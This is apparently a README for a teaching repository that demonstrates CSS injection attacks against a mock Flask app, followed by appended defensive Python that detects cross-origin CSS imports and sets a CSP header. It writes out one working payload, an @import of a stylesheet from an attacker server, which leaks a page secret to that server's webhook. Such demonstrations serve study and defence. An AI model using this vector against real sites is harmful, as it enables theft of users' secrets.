CSS Injection.
Click==7.0
Flask==1.1.1
itsdangerous==1.1.0
Jinja2==2.10.3
MarkupSafe==1.1.1
pyperclip==1.7.0
Werkzeug==0.16.0
pip install -r requirements.txt
An example of a classical CSS Injection attack. The attacker needs to have the user POST the attack vector every time.
- Run attacker/server.py and user/server.py.
- Run attacker/exploit.py.
- Post the attack vector generated by attacker/exploit.py to 0.0.0.0:8080. The leaked secret will be displayed on the console of attacker/server.py.
- Enter the leaked secret into attacker/exploit.py and continue the attack.
- Loop...

Files:
- user/server.py: Mock web application that has a CSS Injection vulnerability.
- attacker/exploit.py: Generates a CSS Injection attack vector and copies it to the clipboard.
- attacker/server.py: Webhook to collect the secret.

An example of CSS Injection using Recursive Import technique.
- Run attacker/server.py and user/server.py.
- Post the attack vector: <style>@import url('http://0.0.0.0:8081/css/0.css')</style>.
- Leakage continues recursively due to CSS import.

Files:
- user/server.py: Mock web application that has a CSS Injection vulnerability.
- attacker/server.py: Webhook to collect the secret.
- attacker/templates/tmpl.jinja2: Attack vector (CSS) template.
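
A defensive counterpart to the two demos above, added here as an example and not part of this repository: it flags posted HTML whose CSS pulls resources from another origin (using the @import vector above as input), escapes the input before rendering, and defines a CSP header that blocks inline and cross-origin styles. The names external_css_urls, render_safely, APP_ORIGIN and CSP_HEADER are hypothetical, and the standard library stands in for the Flask app.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed input: the recursive-import vector quoted in this README.
SAMPLE_POST = "<style>@import url('http://0.0.0.0:8081/css/0.css')</style>"

# Assumption: the application serves its own stylesheets from this origin only.
APP_ORIGIN = "0.0.0.0:8080"

# CSP that forbids inline <style> blocks and stylesheets from other origins.
CSP_HEADER = ("Content-Security-Policy", "default-src 'self'; style-src 'self'")

# url(...) tokens and bare-string @import targets inside CSS text.
_CSS_URL = re.compile(r"""url\(\s*['"]?([^'")\s]+)|@import\s+['"]([^'"]+)""", re.I)


class StyleCollector(HTMLParser):
    """Collects CSS text from <style> elements and style="" attributes."""

    def __init__(self):
        super().__init__()
        self.css, self._in_style = [], False

    def handle_starttag(self, tag, attrs):
        self._in_style = self._in_style or tag == "style"
        self.css += [v for k, v in attrs if k == "style" and v]

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        if self._in_style:
            self.css.append(data)


def external_css_urls(user_html):
    """Return URLs referenced by user-supplied CSS that leave APP_ORIGIN."""
    parser = StyleCollector()
    parser.feed(user_html)
    parser.close()
    urls = [a or b for css in parser.css for a, b in _CSS_URL.findall(css)]
    return [u for u in urls if urlparse(u).netloc not in ("", APP_ORIGIN)]


def render_safely(user_html):
    """Escape user input so it is shown as text instead of parsed as markup."""
    return html.escape(user_html, quote=True)
```

Escaping at render time removes the injection point itself; the CSP header is a second layer for any page where user-controlled markup still reaches the browser.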